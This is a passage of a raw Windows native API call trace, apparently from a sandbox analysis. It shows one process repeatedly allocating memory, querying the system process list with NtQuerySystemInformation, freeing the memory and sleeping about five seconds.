RegionSize=0xdea68*=0x10000) returned 0x0 [0211.850] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.850] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.851] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.851] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.855] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.856] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.858] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.858] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.859] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.859] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.859] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.864] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.865] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.866] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.867] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.868] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.868] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.868] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.873] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.874] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.875] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.876] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.877] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.877] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.877] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.884] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.885] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.887] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.887] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.888] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.888] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.889] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.893] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.894] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.895] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.895] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.896] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.896] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.896] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.900] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.901] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.902] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.902] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.903] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.903] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.903] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.908] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.909] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.910] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.910] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.911] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.911] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.912] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.915] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.916] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.918] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.918] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.919] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.919] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.919] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.922] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.923] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.924] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.924] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.925] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.925] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.925] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.929] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.930] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.931] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.931] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.932] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.932] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.932] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.937] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.938] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.939] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.940] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.941] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.941] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.941] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.946] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.947] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.948] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.948] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.949] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.949] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.949] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.953] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.953] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.955] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.955] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.956] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.956] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.956] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.959] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.960] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.962] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.962] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.962] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.963] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.963] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.966] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.967] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.970] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.970] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.971] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.971] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.971] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.974] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.975] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.976] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.976] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.977] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.977] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.977] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.981] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.981] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.983] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.983] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.983] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.983] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.984] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.987] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.988] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.990] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.990] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.991] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.991] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.991] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.994] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.995] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.014] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.015] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.016] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.016] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.016] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.019] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.020] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.022] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.022] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.022] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.022] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.023] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.027] NtFreeVirtualMemory (ProcessHandle=0xffffffff, 